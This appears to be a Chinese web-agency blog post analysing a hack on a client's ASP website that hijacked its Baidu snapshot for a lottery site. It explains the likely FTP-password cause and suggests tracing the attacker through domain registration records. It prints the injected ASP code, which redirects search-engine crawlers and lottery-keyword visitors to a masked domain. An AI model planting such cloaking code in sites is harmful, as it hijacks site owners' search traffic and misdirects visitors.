寫本篇文章的目的在于揭露一種黑客作弊的手段，也給那些疏于企業網站安全的站長提一個醒。同時提供一種追找黑客行蹤的簡單方法。

鏡子里的自己

前幾日，我的客戶電話說自己的百度排名沒有了，查詢下竟然百度標簽顯示的內容是一家彩票平臺的網站內容。 我知道網站被黑客加入了非法代碼，惡意篡改了百度快照。(截圖如下)

百度快照是如何被黑客篡改的

查看“百度快照”出現的是一組跳轉網站的廣告內容。我們對客戶設置的網站信息消失了。

黑客是如何修改百度快照的

1、黑客是如何修改百度快照的呢?

我進行了排查，客戶的網站是使用asp源碼開發的。發現有個文件被黑客寫入了一段代碼。

路徑：Inc文件夾—SysProduct.asp文件里面最底下添加了如下代碼：

彩票網站的域名信息

<%
function Getbot()
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT")
if instr(1,s_agent,"googlebot",1) > 0 then
GetBot="google"
end if
if instr(1,s_agent,"baiduspider",1) > 0 then
GetBot="baidu"
end if
end function
if GetBot="baidu" or GetBot="google" then
'
Response.Redirect "http://*********"（跳轉的網站，引導百度抓取的內容）
else
'
Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';（目標網站）window.adworkergo='ad_app6'}else{}</script>"
end if
%>

黑客設置的這串代碼導致百度爬蟲抓取網頁的時候，直接抓取越過客戶網站抓取了跳轉網站內容，導致百度快照里面顯示的是別的內容。使得客戶本來排名首頁的網站直接被百度屏蔽了。造成了客戶很大的損失。

2、那么黑客是如何進入后臺的呢?

黑客要進入后臺，必須知道FTP賬戶和密碼，以及IP地址。

造成的原因有如下幾種：

1)一方面是FTP密碼設置的時候比較簡單化，很容易被利用軟件破解掉，

2)另一方面選擇便宜的空間也是一種隱患。因為空間IP以及用戶名是很難被知道的，除非有人提供。

3、網站被黑之后，你如何追查黑客的來源?

方法比較簡單，就是查詢你跳轉的目標網站的域名信息。一般情況下，都是一些小型的站長開發的賺錢網站，通過查詢域名信息你可以獲知該域名的歸屬人是誰，他有可能就是黑你網站的人。

如果是比較大型的網站利用外包的方式進行推廣，那么你也可以得知負責人，給百度或者是網絡警察舉報一下，該網站存在惡意攻擊修改內容的行為，畢竟它也有一定得責任。

信息來自網絡，由洛陽做網站、洛陽網站建設、洛陽網絡公司整理編輯。